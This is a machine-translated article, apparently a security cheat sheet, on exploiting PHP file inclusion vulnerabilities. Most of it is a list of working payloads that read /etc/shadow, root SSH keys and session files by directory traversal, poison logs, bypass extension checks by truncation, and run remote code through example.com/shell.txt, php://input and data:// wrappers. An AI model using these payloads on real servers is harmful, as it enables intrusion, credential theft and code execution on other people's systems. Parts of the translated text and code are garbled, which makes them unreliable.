PHP file contains vulnerability summary

0x00 Preface

PHP file Inclusion vulnerability is caused by the introduction of files through PHP functions, because the incoming file name is not properly verified, so that the operation of the unintended files, can lead to accidental file leaks and even malicious code injection.

The most common is the local file inclusion vulnerability.

Let's look at the following section of index.php code:

<textarea class="crayon-plain print-no" style="-moz-tab-size: 4; font-size: 14px ! important; line-height: 18px ! important; z-index: 0; opacity: 0; overflow: hidden;" readonly="" data-settings="dblclick">if ($_get[' func ']) {include $_get[' func '];} else {include ' default.php ';}</textarea>

12345

if ($_get[' func ']) { include $_get[' func ']; } else { include ' default.php '; }

The intent of the program may be to invoke the style content and functionality inside the add.php when the commit URL is http://example.com/index.php?func=add.php. Direct access to http://example.com/index.php will include the default default.php

Then the question comes, if we submit http://example.com/index.php?func=upload/pic/evil.jpg, And Evil.jpg is a hacker to upload a picture on the server, at the end of the picture to add malicious PHP code, then the malicious code will be introduced to the current file execution.

If there is no valid PHP code in the included file, the file contents will be exported directly.

In the following content will be a code sample as an example, to give you a variety of exotic and wretched use posture.

0x01 Common Local file contains

<textarea class="crayon-plain print-no" style="-moz-tab-size: 4; font-size: 14px ! important; line-height: 18px ! important; z-index: 0; opacity: 0; overflow: hidden;" readonly="" data-settings="dblclick"><?php include ("inc/". $_get[' file ');?></textarea>

1	<?php include("inc/" . $_get[' file ']); ?>

• Include files in the same directory:
  ? file=.htaccess
• Directory traversal:

? file=. /.. /.. /.. /.. /.. /.. /.. /.. /var/lib/locate.db? file=. /.. /.. /.. /.. /.. /.. /.. /.. /var/lib/mlocate/mlocate.db

(These two files in Linux store the path of all files and require root access)

• Contains error log:? file=. /.. /.. /.. /.. /.. /.. /.. /.. /var/log/apache/error.log (try to set UA to "" to get payload into the log)
• To obtain a web directory or other configuration file:

? file=. /.. /.. /.. /.. /.. /.. /.. /.. /usr/local/apache2/conf/httpd.conf

(More →http://wiki.apache.org/httpd/distrosdefaultlayout)

• Include the uploaded attachment:

? file=. /attachment/media/xxx.file

• To read the session file:

? file=. /.. /.. /.. /.. /.. /tmp/sess_tnrdo9ub2tsdurntv0pdir1no7

(The session file is generally in the/tmp directory, the format is Sess_[your PHPSESSID value], sometimes it may be in the/VAR/LIB/PHP5 and the like, it is recommended to read the configuration file first. In certain situations, if you can control the value of the session, you may be able to get a shell)

• If you have root privileges you can also try probation these things:

/root/.ssh/authorized_keys

/root/.ssh/id_rsa

/root/.ssh/id_rsa.keystore

/root/.ssh/id_rsa.pub

/root/.ssh/known_hosts

/etc/shadow

/root/.bash_history

/root/.mysql_history

/proc/self/fd/fd[0-9]* (file identifier)

/proc/mounts

/proc/config.gz

• If you have phpinfo, you can include temporary files:

See Http://hi.baidu.com/mmnwzsdvpkjovwr/item/3f7ceb39965145eea984284el

0x02 restricted local files contain

<textarea class= "Crayon-plain print-no" style= "-moz-tab-size:4"; Font-size:14px! Important Line-height:18px! Important z-index:0; opacity:0; Overflow:hidden; "ReadOnly data-settings=" DblClick "><?php include (" inc/". $_get[' file ']. ". htm"); </textarea>

1	<?php include("inc/" . $_get[' file '] . ". htm"); ?>

• %00 truncation:

? file=. /.. /.. /.. /.. /.. /.. /.. /.. /etc/passwd%00

(Requires magic_quotes_gpc=off,php less than 5.3.4 valid)

• %00 Truncate directory Traversal:

? file=. /.. /.. /.. /.. /.. /.. /.. /.. /var/www/%00

(Requires Magic_quotes_gpc=off,unix file system, such as Freebsd,openbsd,netbsd,solaris)

• Path length truncation:

? file=. /.. /.. /.. /.. /.. /.. /.. /.. /etc/passwd/././././././. [...] /./././././.

(PHP version is less than 5.2.8 (?) Can succeed, Linux requires filenames longer than 4096,windows to be longer than 256)

• Point number truncation:

? file=. /.. /.. /.. /.. /.. /.. /.. /.. /boot.ini/..... [...] ............

(PHP version is less than 5.2.8 (?) Can be successful, only applicable to Windows, the dot number needs to be longer than 256)

0x03 Common remote file contains

<textarea class="crayon-plain print-no" style="-moz-tab-size: 4; font-size: 14px ! important; line-height: 18px ! important; z-index: 0; opacity: 0; overflow: hidden;" readonly="" data-settings="dblclick"><?php include ($_get[' file ');?></textarea>

1	<?php include($_get[' file ']); ?>

• Remote Code Execution:

? file=[http|https|ftp]://example.com/shell.txt

(Requires Allow_url_fopen=on and Allow_url_include=on)

• Using PHP Stream input:

? file=php://input

(Need Allow_url_include=on, detailed →http://php.net/manual/en/wrappers.php.php)

• Using the PHP stream filter:

? file=php://filter/convert.base64-encode/resource=index.php

Ibid.

• Using Data URIs:

? file=data://text/plain;base64,ssbsb3zlifbiuao=

(Requires Allow_url_include=on)

• Execute arbitrary code with XSS:

? file=http://127.0.0.1/path/xss.php?xss=phpcode

(Need allow_url_fopen=on,allow_url_include=on and firewall or whitelist does not allow access to the extranet, first in the same site to find an XSS vulnerability, including this page, you can inject malicious code.) Conditions very extreme and special--)

0x04 a restricted remote file contains

<textarea class="crayon-plain print-no" style="-moz-tab-size: 4; font-size: 14px ! important; line-height: 18px ! important; z-index: 0; opacity: 0; overflow: hidden;" readonly="" data-settings="dblclick"><?php include ($_get[' file '). ". htm");?></textarea>

1	<?php include($_get[' file '] . ". htm"); ?>

• ? file=http://example.com/shell
• ? file=http://example.com/shell.txt?
• ? file=http://example.com/shell.txt%23

(Requires Allow_url_fopen=on and Allow_url_include=on)

• file=\evilshare\shell.php (only need Allow_url_include=on)

0x05 extension

In fact, in front also said that the reason is that the PHP function in the introduction of files, the incoming file name has not been properly verified, so that the operation of the unintended files. In fact, our function of manipulating files is not just an include (), but some of the truncated methods mentioned above can also be applied to the following functions:

Reference article:

http://websec.wordpress.com/2009/11/28/freebsd-directory-listing-with-php-file-functions/

http://www.digininja.org/blog/when_all_you_can_do_is_read.php

Http://wiki.apache.org/httpd/DistrosDefaultLayout

http://ddxhunter.wordpress.com/2010/03/10/lfis-exploitation-techniques/

http://www.coresec.org/2011/05/12/local-file-inclusion-to-remote-command-execution-using-ssh/

http://www.ush.it/2009/02/08/php-filesystem-attack-vectors/

http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/

http://diablohorn.wordpress.com/2010/01/16/interesting-local-file-inclusion-method/

PHP file contains vulnerability summary